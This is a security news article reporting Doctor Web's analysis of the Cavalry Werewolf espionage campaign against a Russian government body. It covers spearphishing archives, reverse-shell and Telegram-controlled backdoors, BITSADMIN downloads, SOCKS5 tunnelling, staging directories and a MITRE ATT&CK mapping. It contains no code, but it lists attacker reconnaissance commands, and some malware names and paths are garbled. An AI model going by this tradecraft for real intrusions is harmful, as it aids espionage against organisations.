Cavalry Werewolf Targets Government Networks, Deploys Backdoor for Access

In July 2025, cybersecurity firm Doctor Web was contacted by a Russian government-owned organization after suspicious spam activity originating from its internal email addresses.

A forensic investigation confirmed the organization had been targeted in a sophisticated cyberespionage campaign conducted by the hacker group known as Cavalry Werewolf.

The group used phishing attachments embedded with new and modified malware variants to infiltrate the government network and collect sensitive data, including internal documents and network configuration details.

The attackers used a spearphishing vector, sending emails containing malicious archives disguised as official documents.

The payload was BackDoor.ShellNET.1, based on the open-source Reverse-Shell-CS tool, established reverse-shell connections to remote servers, allowing attackers to execute commands.

Once access was secured, the threat actors downloaded additional payloads using legitimate system tools, such as BITSADMIN, to escalate the intrusion and establish persistence.

Extensive Malware Arsenal and Toolset

The investigation uncovered a vast arsenal of tools used across the infection chain. In the initial stages, BAT.

Downloader 1138 downloaded additional payloads through PowerShell, while Trojan.Packed2.49708 and Trojan.Siggen 31.54011 deployed embedded backdoors, such as BackDoor.Spy 4033 and BackDoor.Spy.4038.

These tools enabled remote command execution and reconnaissance inside the victim networks. Further post-exploitation involved BackDoor.Tunnel 41, based on the ReverseSocks5 open-source code, establishes covert SOCKS5 tunnels for lateral movement.

Doctor Web also discovered advanced persistence mechanisms through BackDoor.Siggen2.5463, controlled via Telegram bots, and Trojan.Inject5.57968, which injected malicious payloads into legitimate processes like aspnet_compiler.exe.

Modified versions of popular utilities, including WinRAR, 7-Zip, and Visual Studio Code, were found to be trojanized.Packed2.49862, embedding malware such as BackDoor.ReverseProxy.1, BackDoor.Havoc 16 and Trojan.Clipper.808.

Persistent Command and Control Operations

Cavalry Werewolf heavily relies on external C2 communication and Telegram-controlled backdoors to maintain prolonged network access.

The group consistently uses directories such as C:userspublicpictures, libraries, and downloads for staging payloads and persistence.

Collected commands observed during analysis included reconnaissance functions like ipconfig /all, net user, and whoami, as well as file enumeration and proxy configuration to assess system reachability.

Mapping the attack chain to the MITRE ATT&CK framework, Doctor Web attributed the following techniques: Spearphishing Attachment (T1566.001), PowerShell Execution (T1059.001), BITS Jobs for Persistence (T1197), and Exfiltration Over C2 Channel (T1041).

The continual use of open-source frameworks such as ReverseSocks5 and AdaptixC2 illustrates Cavalry Werewolf’s strategy of blending custom development with publicly available tooling, thereby increasing stealth and adaptability during operations.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Cavalry Werewolf Targets Government Networks, Deploys Backdoor for Access appeared first on Cyber Security News.